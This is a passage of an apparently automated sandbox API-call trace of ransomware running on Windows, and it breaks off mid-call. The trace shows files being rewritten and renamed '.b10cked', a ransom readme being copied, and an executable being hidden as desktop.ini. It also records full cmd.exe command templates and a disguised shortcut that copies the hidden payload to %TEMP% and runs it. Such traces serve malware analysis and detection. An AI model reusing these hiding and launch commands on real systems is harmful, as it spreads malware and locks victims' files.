0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0150.528] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3594 [0150.528] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3a7c [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3a7c [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0150.530] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0150.530] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.531] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0150.531] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.531] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0150.531] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1d3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.531] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7485, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1d3f [0150.531] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1d3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1d3d, lpOverlapped=0x0) returned 1 [0150.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Active.GRL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0150.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Active.GRL", cchWideChar=10, lpMultiByteStr=0x131326c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Active.GRL", lpUsedDefaultChar=0x0) returned 10 [0150.535] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3a7c [0150.535] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0150.535] CloseHandle (hObject=0x114) returned 1 [0150.536] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL") returned 0x28 [0150.537] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0150.537] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xcdc, dwThreadId=0x188)) returned 1 [0150.539] CloseHandle (hObject=0x110) returned 1 [0150.539] CloseHandle (hObject=0x114) returned 1 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0150.539] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount1=32, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\", cchCount2=88) returned 3 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\", cchLength=0x20 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\") returned 0x20 [0150.539] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0150.539] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\MF\\", cchCount1=32, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0150.539] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0150.540] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0150.540] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0150.540] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0150.540] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0150.540] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0150.540] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xc3c, dwThreadId=0xd00)) returned 1 [0150.541] CloseHandle (hObject=0x110) returned 1 [0150.541] CloseHandle (hObject=0x114) returned 1 [0150.541] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\bl0cked-readme.rtf")) returned 0xffffffff [0150.542] GetLastError () returned 0x2 [0150.542] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0150.545] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\bl0cked-readme.rtf")) returned 0x2020 [0150.545] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.545] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0150.545] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0150.545] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0150.545] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0150.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0150.546] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0150.546] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\") returned 0x1e [0150.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0150.546] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0150.546] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\MF", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\MF") returned 0x1d [0150.546] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x132 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\MF\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x132 [0150.546] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0150.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xc28, dwThreadId=0xc98)) returned 1 [0150.548] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0151.498] CloseHandle (hObject=0x114) returned 1 [0151.498] CloseHandle (hObject=0x110) returned 1 [0151.498] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.498] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0151.498] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0151.498] GetTickCount () returned 0x2ecae [0151.498] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20828761084) returned 1 [0151.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x45\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x74\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x76\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0151.499] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0151.499] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0151.499] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0151.499] CharUpperBuffW (in: lpsz="explorer.exe \"MF\" & type \"MF\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x55 | out: lpsz="EXPLORER.EXE \"MF\" & TYPE \"MF\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x55 [0151.499] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0151.499] CharUpperBuffW (in: lpsz="explorer.exe \"MF\" & type \"MF\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x56 | out: lpsz="EXPLORER.EXE \"MF\" & TYPE \"MF\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x56 [0151.499] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0151.499] CoInitialize (pvReserved=0x0) returned 0x0 [0151.499] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0151.501] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0151.501] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0151.501] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0151.503] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"MF\" & type \"MF\\desktop.ini\" > \"%TEMP%\\EtIeJuvp.exe\" && \"%TEMP%\\EtIeJuvp.exe\"") returned 0x0 [0151.503] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0151.503] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0151.503] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0151.503] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\MF.lnk", fRemember=0) returned 0x0 [0151.512] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0151.512] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0151.512] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0151.512] CoUninitialize () [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0151.513] ReleaseMutex (hMutex=0xf8) returned 1 [0151.513] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0151.517] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3a7c [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0151.518] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20830702764) returned 1 [0151.518] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 